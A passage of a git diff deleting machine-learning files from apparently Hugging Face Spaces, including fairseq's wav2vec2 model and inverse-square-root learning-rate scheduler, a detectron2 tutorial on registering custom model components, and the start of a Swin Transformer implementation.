" - "otherwise uses final_dim / latent_groups" - }, - ) - - # masking - mask_length: int = field(default=10, metadata={"help": "mask length"}) - mask_prob: float = field( - default=0.65, metadata={"help": "probability of replacing a token with mask"} - ) - mask_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", metadata={"help": "how to choose mask length"} - ) - mask_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indices" - }, - ) - no_mask_overlap: bool = field( - default=False, metadata={"help": "whether to allow masks to overlap"} - ) - mask_min_space: int = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # channel masking - mask_channel_length: int = field( - default=10, metadata={"help": "length of the mask for features (channels)"} - ) - mask_channel_prob: float = field( - default=0.0, metadata={"help": "probability of replacing a feature with 0"} - ) - mask_channel_before: bool = False - mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", - metadata={"help": "how to choose mask length for channel masking"}, - ) - mask_channel_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indicesh" - }, - ) - no_mask_channel_overlap: bool = field( - default=False, metadata={"help": "whether to allow channel masks to overlap"} - ) - mask_channel_min_space: int = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # negative selection - num_negatives: int = field( - default=100, - metadata={"help": "number of negative examples from the same sample"}, - ) - negatives_from_everywhere: bool = field( - default=False, - metadata={"help": "sample negatives from everywhere, not just masked states"}, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "number of negative examples from the any sample"} - ) - codebook_negatives: int = field( - default=0, metadata={"help": "number of negative examples codebook"} - ) - - # positional embeddings - conv_pos: int = field( - default=128, - metadata={"help": "number of filters for convolutional positional embeddings"}, - ) - conv_pos_groups: int = field( - default=16, - metadata={"help": "number of groups for convolutional positional embedding"}, - ) - - latent_temp: Tuple[float, float, float] = field( - default=(2, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling. 
" - "can be tuple of 3 values (start, end, decay)" - }, - ) - - -@register_model("wav2vec2", dataclass=Wav2Vec2Config) -class Wav2Vec2Model(BaseFairseqModel): - def __init__(self, cfg: Wav2Vec2Config): - super().__init__() - self.cfg = cfg - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.embed = feature_enc_layers[-1][0] - - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - mode=cfg.extractor_mode, - conv_bias=cfg.conv_bias, - ) - - self.post_extract_proj = ( - nn.Linear(self.embed, cfg.encoder_embed_dim) - if self.embed != cfg.encoder_embed_dim and not cfg.quantize_input - else None - ) - - self.mask_prob = cfg.mask_prob - self.mask_selection = cfg.mask_selection - self.mask_other = cfg.mask_other - self.mask_length = cfg.mask_length - self.no_mask_overlap = cfg.no_mask_overlap - self.mask_min_space = cfg.mask_min_space - - self.mask_channel_prob = cfg.mask_channel_prob - self.mask_channel_before = cfg.mask_channel_before - self.mask_channel_selection = cfg.mask_channel_selection - self.mask_channel_other = cfg.mask_channel_other - self.mask_channel_length = cfg.mask_channel_length - self.no_mask_channel_overlap = cfg.no_mask_channel_overlap - self.mask_channel_min_space = cfg.mask_channel_min_space - - self.dropout_input = nn.Dropout(cfg.dropout_input) - self.dropout_features = nn.Dropout(cfg.dropout_features) - - self.feature_grad_mult = cfg.feature_grad_mult - - self.quantizer = None - self.input_quantizer = None - - self.n_negatives = cfg.num_negatives - self.cross_sample_negatives = cfg.cross_sample_negatives - self.codebook_negatives = cfg.codebook_negatives - self.negatives_from_everywhere = cfg.negatives_from_everywhere - - self.logit_temp = cfg.logit_temp - - final_dim = cfg.final_dim if cfg.final_dim > 0 else cfg.encoder_embed_dim - - if cfg.quantize_targets: - vq_dim = cfg.latent_dim if cfg.latent_dim > 0 else final_dim - self.quantizer = GumbelVectorQuantizer( - dim=self.embed, - num_vars=cfg.latent_vars, - temp=cfg.latent_temp, - groups=cfg.latent_groups, - combine_groups=False, - vq_dim=vq_dim, - time_first=True, - weight_proj_depth=cfg.quantizer_depth, - weight_proj_factor=cfg.quantizer_factor, - ) - self.project_q = nn.Linear(vq_dim, final_dim) - else: - self.project_q = nn.Linear(self.embed, final_dim) - - if cfg.quantize_input: - if cfg.same_quantizer and self.quantizer is not None: - vq_dim = final_dim - self.input_quantizer = self.quantizer - else: - vq_dim = cfg.latent_dim if cfg.latent_dim > 0 else cfg.encoder_embed_dim - self.input_quantizer = GumbelVectorQuantizer( - dim=self.embed, - num_vars=cfg.latent_vars, - temp=cfg.latent_temp, - groups=cfg.latent_groups, - combine_groups=False, - vq_dim=vq_dim, - time_first=True, - weight_proj_depth=cfg.quantizer_depth, - weight_proj_factor=cfg.quantizer_factor, - ) - self.project_inp = nn.Linear(vq_dim, cfg.encoder_embed_dim) - - self.mask_emb = nn.Parameter( - torch.FloatTensor(cfg.encoder_embed_dim).uniform_() - ) - - self.encoder = TransformerEncoder(cfg) - self.layer_norm = LayerNorm(self.embed) - - self.target_glu = None - if cfg.target_glu: - self.target_glu = nn.Sequential( - nn.Linear(final_dim, final_dim * 2), nn.GLU() - ) - - self.final_proj = nn.Linear(cfg.encoder_embed_dim, final_dim) - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - return state_dict - - @classmethod - def build_model(cls, cfg: Wav2Vec2Config, 
task=None): - """Build a new model instance.""" - - return cls(cfg) - - def apply_mask( - self, - x, - padding_mask, - mask_indices=None, - mask_channel_indices=None, - ): - B, T, C = x.shape - - if self.mask_channel_prob > 0 and self.mask_channel_before: - mask_channel_indices = compute_mask_indices( - (B, C), - None, - self.mask_channel_prob, - self.mask_channel_length, - self.mask_channel_selection, - self.mask_channel_other, - no_overlap=self.no_mask_channel_overlap, - min_space=self.mask_channel_min_space, - ) - mask_channel_indices = ( - torch.from_numpy(mask_channel_indices) - .to(x.device) - .unsqueeze(1) - .expand(-1, T, -1) - ) - x[mask_channel_indices] = 0 - - if self.mask_prob > 0: - if mask_indices is None: - mask_indices = compute_mask_indices( - (B, T), - padding_mask, - self.mask_prob, - self.mask_length, - self.mask_selection, - self.mask_other, - min_masks=2, - no_overlap=self.no_mask_overlap, - min_space=self.mask_min_space, - ) - mask_indices = torch.from_numpy(mask_indices).to(x.device) - x = index_put(x, mask_indices, self.mask_emb) - else: - mask_indices = None - - if self.mask_channel_prob > 0 and not self.mask_channel_before: - if mask_channel_indices is None: - mask_channel_indices = compute_mask_indices( - (B, C), - None, - self.mask_channel_prob, - self.mask_channel_length, - self.mask_channel_selection, - self.mask_channel_other, - no_overlap=self.no_mask_channel_overlap, - min_space=self.mask_channel_min_space, - ) - mask_channel_indices = ( - torch.from_numpy(mask_channel_indices) - .to(x.device) - .unsqueeze(1) - .expand(-1, T, -1) - ) - x = index_put(x, mask_channel_indices, 0) - - return x, mask_indices - - def sample_negatives(self, y, num, padding_count=None): - - if self.n_negatives == 0 and self.cross_sample_negatives == 0: - return y.new(0) - - bsz, tsz, fsz = y.shape - y = y.view(-1, fsz) # BTC => (BxT)C - - # FIXME: what happens if padding_count is specified? 
- cross_high = tsz * bsz - high = tsz - (padding_count or 0) - with torch.no_grad(): - assert high > 1, f"{bsz,tsz,fsz}" - - if self.n_negatives > 0: - tszs = ( - buffered_arange(num) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * num) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(num) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * num), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[neg_idxs.view(-1)] - negs = negs.view( - bsz, num, self.n_negatives + self.cross_sample_negatives, fsz - ).permute( - 2, 0, 1, 3 - ) # to NxBxTxC - return negs, neg_idxs - - def compute_preds(self, x, y, negatives): - - neg_is_pos = (y == negatives).all(-1) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) - - logits = torch.cosine_similarity(x.float(), targets.float(), dim=-1).type_as(x) - - logits = logits / self.logit_temp - - if is_xla_tensor(logits) or neg_is_pos.any(): - fillval = -float(2 ** 30) - if not hasattr(self, "_inftensor"): - self._inftensor = ( - torch.tensor(fillval).to(x.device) - if is_xla_tensor(logits) - else float("-inf") - ) - logits[1:] = index_put(logits[1:], neg_is_pos, self._inftensor) - - return logits - - def _get_feat_extract_output_lengths(self, input_lengths: torch.LongTensor): - """ - Computes the output length of the convolutional layers - """ - - def _conv_out_length(input_length, kernel_size, stride): - return torch.floor((input_length - kernel_size) / stride + 1) - - conv_cfg_list = eval(self.cfg.conv_feature_layers) - - for i in range(len(conv_cfg_list)): - input_lengths = _conv_out_length( - input_lengths, conv_cfg_list[i][1], conv_cfg_list[i][2] - ) - - return input_lengths.to(torch.long) - - def forward( - self, - source, - padding_mask=None, - mask=True, - features_only=False, - layer=None, - mask_indices=None, - mask_channel_indices=None, - padding_count=None, - ): - - if self.feature_grad_mult > 0: - features = self.feature_extractor(source) - if self.feature_grad_mult != 1.0: - features = GradMultiply.apply(features, self.feature_grad_mult) - else: - with torch.no_grad(): - features = self.feature_extractor(source) - - features_pen = features.float().pow(2).mean() - - features = features.transpose(1, 2) - features = self.layer_norm(features) - unmasked_features = features.clone() - - if padding_mask is not None and padding_mask.any(): - input_lengths = (1 - padding_mask.long()).sum(-1) - # apply conv formula to get real output_lengths - output_lengths = self._get_feat_extract_output_lengths(input_lengths) - - padding_mask = torch.zeros( - features.shape[:2], dtype=features.dtype, device=features.device - ) - - # these two operations makes sure that all values - # before the output lengths indices are attended to - padding_mask[ - ( - torch.arange(padding_mask.shape[0], device=padding_mask.device), - output_lengths - 1, - ) - ] = 1 - padding_mask = (1 - padding_mask.flip([-1]).cumsum(-1).flip([-1])).bool() - else: - padding_mask = None - - if self.post_extract_proj is not None: - features = 
self.post_extract_proj(features) - - features = self.dropout_input(features) - unmasked_features = self.dropout_features(unmasked_features) - - num_vars = None - code_ppl = None - prob_ppl = None - curr_temp = None - - if self.input_quantizer: - q = self.input_quantizer(features, produce_targets=False) - features = q["x"] - num_vars = q["num_vars"] - code_ppl = q["code_perplexity"] - prob_ppl = q["prob_perplexity"] - curr_temp = q["temp"] - features = self.project_inp(features) - - if mask: - x, mask_indices = self.apply_mask( - features, - padding_mask, - mask_indices=mask_indices, - mask_channel_indices=mask_channel_indices, - ) - if not is_xla_tensor(x) and mask_indices is not None: - # tpu-comment: reducing the size in a dynamic way causes - # too many recompilations on xla. - y = unmasked_features[mask_indices].view( - unmasked_features.size(0), -1, unmasked_features.size(-1) - ) - else: - y = unmasked_features - else: - x = features - y = unmasked_features - mask_indices = None - - x, layer_results = self.encoder(x, padding_mask=padding_mask, layer=layer) - - if features_only: - return { - "x": x, - "padding_mask": padding_mask, - "features": unmasked_features, - "layer_results": layer_results, - } - - if self.quantizer: - q = self.quantizer(y, produce_targets=False) - y = q["x"] - num_vars = q["num_vars"] - code_ppl = q["code_perplexity"] - prob_ppl = q["prob_perplexity"] - curr_temp = q["temp"] - - y = self.project_q(y) - - if self.negatives_from_everywhere: - neg_cands = self.quantizer(unmasked_features, produce_targets=False)[ - "x" - ] - negs, _ = self.sample_negatives( - neg_cands, - y.size(1), - padding_count=padding_count, - ) - negs = self.project_q(negs) - - else: - negs, _ = self.sample_negatives( - y, - y.size(1), - padding_count=padding_count, - ) - - if self.codebook_negatives > 0: - cb_negs = self.quantizer.sample_from_codebook( - y.size(0) * y.size(1), self.codebook_negatives - ) - cb_negs = cb_negs.view( - self.codebook_negatives, y.size(0), y.size(1), -1 - ) # order doesnt matter - cb_negs = self.project_q(cb_negs) - negs = torch.cat([negs, cb_negs], dim=0) - else: - y = self.project_q(y) - - if self.negatives_from_everywhere: - negs, _ = self.sample_negatives( - unmasked_features, - y.size(1), - padding_count=padding_count, - ) - negs = self.project_q(negs) - else: - negs, _ = self.sample_negatives( - y, - y.size(1), - padding_count=padding_count, - ) - - if not is_xla_tensor(x): - # tpu-comment: reducing the size in a dynamic way causes - # too many recompilations on xla. 
- x = x[mask_indices].view(x.size(0), -1, x.size(-1)) - - if self.target_glu: - y = self.target_glu(y) - negs = self.target_glu(negs) - - x = self.final_proj(x) - x = self.compute_preds(x, y, negs) - - result = { - "x": x, - "padding_mask": padding_mask, - "features_pen": features_pen, - } - - if prob_ppl is not None: - result["prob_perplexity"] = prob_ppl - result["code_perplexity"] = code_ppl - result["num_vars"] = num_vars - result["temp"] = curr_temp - - return result - - def quantize(self, x): - assert self.quantizer is not None - x = self.feature_extractor(x) - x = x.transpose(1, 2) - x = self.layer_norm(x) - return self.quantizer.forward_idx(x) - - def extract_features(self, source, padding_mask, mask=False, layer=None): - res = self.forward( - source, padding_mask, mask=mask, features_only=True, layer=layer - ) - return res - - def get_logits(self, net_output): - logits = net_output["x"] - logits = logits.transpose(0, 2) - logits = logits.reshape(-1, logits.size(-1)) - return logits - - def get_targets(self, sample, net_output, expand_steps=True): - x = net_output["x"] - return x.new_zeros(x.size(1) * x.size(2), dtype=torch.long) - - def get_extra_losses(self, net_output): - pen = [] - - if "prob_perplexity" in net_output: - pen.append( - (net_output["num_vars"] - net_output["prob_perplexity"]) - / net_output["num_vars"] - ) - - if "features_pen" in net_output: - pen.append(net_output["features_pen"]) - - return pen - - def remove_pretraining_modules(self): - self.quantizer = None - self.project_q = None - self.target_glu = None - self.final_proj = None - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers: List[Tuple[int, int, int]], - dropout: float = 0.0, - mode: str = "default", - conv_bias: bool = False, - ): - super().__init__() - - assert mode in {"default", "layer_norm"} - - def block( - n_in, - n_out, - k, - stride, - is_layer_norm=False, - is_group_norm=False, - conv_bias=False, - ): - def make_conv(): - conv = nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias) - nn.init.kaiming_normal_(conv.weight) - return conv - - assert ( - is_layer_norm and is_group_norm - ) == False, "layer norm and group norm are exclusive" - - if is_layer_norm: - return nn.Sequential( - make_conv(), - nn.Dropout(p=dropout), - nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=True), - TransposeLast(), - ), - nn.GELU(), - ) - elif is_group_norm: - return nn.Sequential( - make_conv(), - nn.Dropout(p=dropout), - Fp32GroupNorm(dim, dim, affine=True), - nn.GELU(), - ) - else: - return nn.Sequential(make_conv(), nn.Dropout(p=dropout), nn.GELU()) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for i, cl in enumerate(conv_layers): - assert len(cl) == 3, "invalid conv definition: " + str(cl) - (dim, k, stride) = cl - - self.conv_layers.append( - block( - in_d, - dim, - k, - stride, - is_layer_norm=mode == "layer_norm", - is_group_norm=mode == "default" and i == 0, - conv_bias=conv_bias, - ) - ) - in_d = dim - - def forward(self, x): - - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - x = conv(x) - - return x - - -class TransformerEncoder(nn.Module): - def __init__(self, args): - super().__init__() - - self.dropout = args.dropout - self.embedding_dim = args.encoder_embed_dim - - self.pos_conv = nn.Conv1d( - self.embedding_dim, - self.embedding_dim, - kernel_size=args.conv_pos, - padding=args.conv_pos // 2, - groups=args.conv_pos_groups, - ) - dropout = 0 - std = math.sqrt((4 * (1.0 - dropout)) / (args.conv_pos * 
self.embedding_dim)) - nn.init.normal_(self.pos_conv.weight, mean=0, std=std) - nn.init.constant_(self.pos_conv.bias, 0) - - self.pos_conv = nn.utils.weight_norm(self.pos_conv, name="weight", dim=2) - self.pos_conv = nn.Sequential(self.pos_conv, SamePad(args.conv_pos), nn.GELU()) - - self.layers = nn.ModuleList( - [ - TransformerSentenceEncoderLayer( - embedding_dim=self.embedding_dim, - ffn_embedding_dim=args.encoder_ffn_embed_dim, - num_attention_heads=args.encoder_attention_heads, - dropout=self.dropout, - attention_dropout=args.attention_dropout, - activation_dropout=args.activation_dropout, - activation_fn=args.activation_fn, - layer_norm_first=args.layer_norm_first, - ) - for _ in range(args.encoder_layers) - ] - ) - - self.layer_norm_first = args.layer_norm_first - self.layer_norm = LayerNorm(self.embedding_dim) - self.layerdrop = args.encoder_layerdrop - - self.apply(init_bert_params) - - def forward(self, x, padding_mask=None, layer=None): - x, layer_results = self.extract_features(x, padding_mask, layer) - - if self.layer_norm_first and layer is None: - x = self.layer_norm(x) - - return x, layer_results - - def extract_features(self, x, padding_mask=None, tgt_layer=None): - - if padding_mask is not None: - x = index_put(x, padding_mask, 0) - - x_conv = self.pos_conv(x.transpose(1, 2)) - x_conv = x_conv.transpose(1, 2) - x = x + x_conv - - if not self.layer_norm_first: - x = self.layer_norm(x) - - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - layer_results = [] - r = None - for i, layer in enumerate(self.layers): - dropout_probability = np.random.random() - if not self.training or (dropout_probability > self.layerdrop): - x, z = layer(x, self_attn_padding_mask=padding_mask, need_weights=False) - if tgt_layer is not None: - layer_results.append((x, z)) - if i == tgt_layer: - r = x - break - - if r is not None: - x = r - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - - return x, layer_results - - def max_positions(self): - """Maximum output length supported by the encoder.""" - return self.args.max_positions - - def upgrade_state_dict_named(self, state_dict, name): - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - return state_dict - - -class TransformerSentenceEncoderLayer(nn.Module): - """ - Implements a Transformer Encoder Layer used in BERT/XLM style pre-trained - models. 
- """ - - def __init__( - self, - embedding_dim: float = 768, - ffn_embedding_dim: float = 3072, - num_attention_heads: float = 8, - dropout: float = 0.1, - attention_dropout: float = 0.1, - activation_dropout: float = 0.1, - activation_fn: str = "relu", - layer_norm_first: bool = False, - ) -> None: - - super().__init__() - # Initialize parameters - self.embedding_dim = embedding_dim - self.dropout = dropout - self.activation_dropout = activation_dropout - - # Initialize blocks - self.activation_fn = utils.get_activation_fn(activation_fn) - self.self_attn = MultiheadAttention( - self.embedding_dim, - num_attention_heads, - dropout=attention_dropout, - self_attention=True, - ) - - self.dropout1 = nn.Dropout(dropout) - self.dropout2 = nn.Dropout(self.activation_dropout) - self.dropout3 = nn.Dropout(dropout) - - self.layer_norm_first = layer_norm_first - - # layer norm associated with the self attention layer - self.self_attn_layer_norm = LayerNorm(self.embedding_dim) - self.fc1 = nn.Linear(self.embedding_dim, ffn_embedding_dim) - self.fc2 = nn.Linear(ffn_embedding_dim, self.embedding_dim) - - # layer norm associated with the position wise feed-forward NN - self.final_layer_norm = LayerNorm(self.embedding_dim) - - def forward( - self, - x: torch.Tensor, - self_attn_mask: torch.Tensor = None, - self_attn_padding_mask: torch.Tensor = None, - need_weights: bool = False, - att_args=None, - ): - """ - LayerNorm is applied either before or after the self-attention/ffn - modules similar to the original Transformer imlementation. - """ - residual = x - - if self.layer_norm_first: - x = self.self_attn_layer_norm(x) - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - attn_mask=self_attn_mask, - ) - x = self.dropout1(x) - x = residual + x - - residual = x - x = self.final_layer_norm(x) - x = self.activation_fn(self.fc1(x)) - x = self.dropout2(x) - x = self.fc2(x) - x = self.dropout3(x) - x = residual + x - else: - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - ) - - x = self.dropout1(x) - x = residual + x - - x = self.self_attn_layer_norm(x) - - residual = x - x = self.activation_fn(self.fc1(x)) - x = self.dropout2(x) - x = self.fc2(x) - x = self.dropout3(x) - x = residual + x - x = self.final_layer_norm(x) - - return x, attn diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py deleted file mode 100644 index 0f87bb5d7ed5c7eb8011d4c651f2ecbf0ae700ac..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/optim/lr_scheduler/inverse_square_root_schedule.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -from collections.abc import Collection -from dataclasses import dataclass, field -from typing import List - -from omegaconf import II - -from fairseq.dataclass import FairseqDataclass -from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler - - -@dataclass -class InverseSquareRootLRScheduleConfig(FairseqDataclass): - warmup_updates: int = field( - default=4000, - metadata={"help": "warmup the learning rate linearly for the first N updates"}, - ) - warmup_init_lr: float = field( - default=-1, - metadata={ - "help": "initial learning rate during warmup phase; default is cfg.lr" - }, - ) - lr: List[float] = II("optimization.lr") - - -@register_lr_scheduler("inverse_sqrt", dataclass=InverseSquareRootLRScheduleConfig) -class InverseSquareRootSchedule(FairseqLRScheduler): - """Decay the LR based on the inverse square root of the update number. - - We also support a warmup phase where we linearly increase the learning rate - from some initial learning rate (``--warmup-init-lr``) until the configured - learning rate (``--lr``). Thereafter we decay proportional to the number of - updates, with a decay factor set to align with the configured learning rate. - - During warmup:: - - lrs = torch.linspace(cfg.warmup_init_lr, cfg.lr, cfg.warmup_updates) - lr = lrs[update_num] - - After warmup:: - - decay_factor = cfg.lr * sqrt(cfg.warmup_updates) - lr = decay_factor / sqrt(update_num) - """ - - def __init__(self, cfg: InverseSquareRootLRScheduleConfig, optimizer): - super().__init__(cfg, optimizer) - if isinstance(cfg.lr, Collection) and len(cfg.lr) > 1: - raise ValueError( - "Cannot use a fixed learning rate schedule with inverse_sqrt." - " Consider --lr-scheduler=fixed instead." - ) - warmup_end_lr = cfg.lr[0] if isinstance(cfg.lr, Collection) else cfg.lr - if cfg.warmup_init_lr < 0: - cfg.warmup_init_lr = 0 if cfg.warmup_updates > 0 else warmup_end_lr - - # linearly warmup for the first cfg.warmup_updates - self.lr_step = (warmup_end_lr - cfg.warmup_init_lr) / cfg.warmup_updates - - # then, decay prop. 
to the inverse square root of the update number - self.decay_factor = warmup_end_lr * cfg.warmup_updates ** 0.5 - - # initial learning rate - self.lr = cfg.warmup_init_lr - self.optimizer.set_lr(self.lr) - - def step(self, epoch, val_loss=None): - """Update the learning rate at the end of the given epoch.""" - super().step(epoch, val_loss) - # we don't change the learning rate at epoch boundaries - return self.optimizer.get_lr() - - def step_update(self, num_updates): - """Update the learning rate after each update.""" - if num_updates < self.cfg.warmup_updates: - self.lr = self.cfg.warmup_init_lr + num_updates * self.lr_step - else: - self.lr = self.decay_factor * num_updates ** -0.5 - self.optimizer.set_lr(self.lr) - return self.lr diff --git a/spaces/Omnibus/Bark-simple/README.md b/spaces/Omnibus/Bark-simple/README.md deleted file mode 100644 index b996ffc73cd0c56741751057fc337ec40dcce73b..0000000000000000000000000000000000000000 --- a/spaces/Omnibus/Bark-simple/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Bark Simple -emoji: 🐕 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.41.2 -app_file: app.py -pinned: true ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx b/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx deleted file mode 100644 index a3f01d61399336356c7ad367b3115dbc282bd0f7..0000000000000000000000000000000000000000 --- a/spaces/OpenDILabCommunity/DI-sheep/DI-sheep/ui/src/main.tsx +++ /dev/null @@ -1,10 +0,0 @@ -import React from 'react'; -import ReactDOM from 'react-dom/client'; -import App from './App'; -import './index.css'; - -ReactDOM.createRoot(document.getElementById('root') as HTMLElement).render( - - - -); diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md deleted file mode 100644 index 967d126503c71b419bca94615cb1090e1a79cb49..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/docs/tutorials/write-models.md +++ /dev/null @@ -1,90 +0,0 @@ -# Write Models - -If you are trying to do something completely new, you may wish to implement -a model entirely from scratch. However, in many situations you may -be interested in modifying or extending some components of an existing model. -Therefore, we also provide mechanisms that let users override the -behavior of certain internal components of standard models. - - -## Register New Components - -For common concepts that users often want to customize, such as "backbone feature extractor", "box head", -we provide a registration mechanism for users to inject custom implementation that -will be immediately available to use in config files. 
- -For example, to add a new backbone, import this code in your code: -```python -from detectron2.modeling import BACKBONE_REGISTRY, Backbone, ShapeSpec - -@BACKBONE_REGISTRY.register() -class ToyBackbone(Backbone): - def __init__(self, cfg, input_shape): - super().__init__() - # create your own backbone - self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=16, padding=3) - - def forward(self, image): - return {"conv1": self.conv1(image)} - - def output_shape(self): - return {"conv1": ShapeSpec(channels=64, stride=16)} -``` - -In this code, we implement a new backbone following the interface of the -[Backbone](../modules/modeling.html#detectron2.modeling.Backbone) class, -and register it into the [BACKBONE_REGISTRY](../modules/modeling.html#detectron2.modeling.BACKBONE_REGISTRY) -which requires subclasses of `Backbone`. -After importing this code, detectron2 can link the name of the class to its implementation. Therefore you can write the following code: - -```python -cfg = ... # read a config -cfg.MODEL.BACKBONE.NAME = 'ToyBackbone' # or set it in the config file -model = build_model(cfg) # it will find `ToyBackbone` defined above -``` - -As another example, to add new abilities to the ROI heads in the Generalized R-CNN meta-architecture, -you can implement a new -[ROIHeads](../modules/modeling.html#detectron2.modeling.ROIHeads) subclass and put it in the `ROI_HEADS_REGISTRY`. -[DensePose](../../projects/DensePose) -and [MeshRCNN](https://github.com/facebookresearch/meshrcnn) -are two examples that implement new ROIHeads to perform new tasks. -And [projects/](../../projects/) -contains more examples that implement different architectures. - -A complete list of registries can be found in [API documentation](../modules/modeling.html#model-registries). -You can register components in these registries to customize different parts of a model, or the -entire model. - -## Construct Models with Explicit Arguments - -Registry is a bridge to connect names in config files to the actual code. -They are meant to cover a few main components that users frequently need to replace. -However, the capability of a text-based config file is sometimes limited and -some deeper customization may be available only through writing code. - -Most model components in detectron2 have a clear `__init__` interface that documents -what input arguments it needs. Calling them with custom arguments will give you a custom variant -of the model. - -As an example, to use __custom loss function__ in the box head of a Faster R-CNN, we can do the following: - -1. Losses are currently computed in [FastRCNNOutputLayers](../modules/modeling.html#detectron2.modeling.FastRCNNOutputLayers). - We need to implement a variant or a subclass of it, with custom loss functions, named `MyRCNNOutput`. -2. Call `StandardROIHeads` with `box_predictor=MyRCNNOutput()` argument instead of the builtin `FastRCNNOutputLayers`. - If all other arguments should stay unchanged, this can be easily achieved by using the [configurable `__init__`](../modules/config.html#detectron2.config.configurable) mechanism: - - ```python - roi_heads = StandardROIHeads( - cfg, backbone.output_shape(), - box_predictor=MyRCNNOutput(...) - ) - ``` -3. 
(optional) If we want to enable this new model from a config file, registration is needed: - ```python - @ROI_HEADS_REGISTRY.register() - class MyStandardROIHeads(StandardROIHeads): - def __init__(self, cfg, input_shape): - super().__init__(cfg, input_shape, - box_predictor=MyRCNNOutput(...)) - ``` diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py b/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py deleted file mode 100644 index c1affc9a8695474e831ad060343c1988d750dc5f..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/swin_transformer.py +++ /dev/null @@ -1,654 +0,0 @@ -# -------------------------------------------------------- -# Swin Transformer -# Copyright (c) 2021 Microsoft -# Licensed under The MIT License [see LICENSE for details] -# Written by Ze Liu -# -------------------------------------------------------- - -import numpy as np -from scipy import interpolate - -import torch -import torch.nn as nn -import torch.utils.checkpoint as checkpoint -from timm.models.layers import DropPath, to_2tuple, trunc_normal_ - - -class Mlp(nn.Module): - def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.): - super().__init__() - out_features = out_features or in_features - hidden_features = hidden_features or in_features - self.fc1 = nn.Linear(in_features, hidden_features) - self.act = act_layer() - self.fc2 = nn.Linear(hidden_features, out_features) - self.drop = nn.Dropout(drop) - - def forward(self, x): - x = self.fc1(x) - x = self.act(x) - x = self.drop(x) - x = self.fc2(x) - x = self.drop(x) - return x - - -def window_partition(x, window_size): - """ - Args: - x: (B, H, W, C) - window_size (int): window size - - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - x = x.view(B, H // window_size, window_size, W // window_size, window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C) - return windows - - -def window_reverse(windows, window_size, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - window_size (int): Window size - H (int): Height of image - W (int): Width of image - - Returns: - x: (B, H, W, C) - """ - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - -class WindowAttention(nn.Module): - r""" Window based multi-head self attention (W-MSA) module with relative position bias. - It supports both of shifted and non-shifted window. - 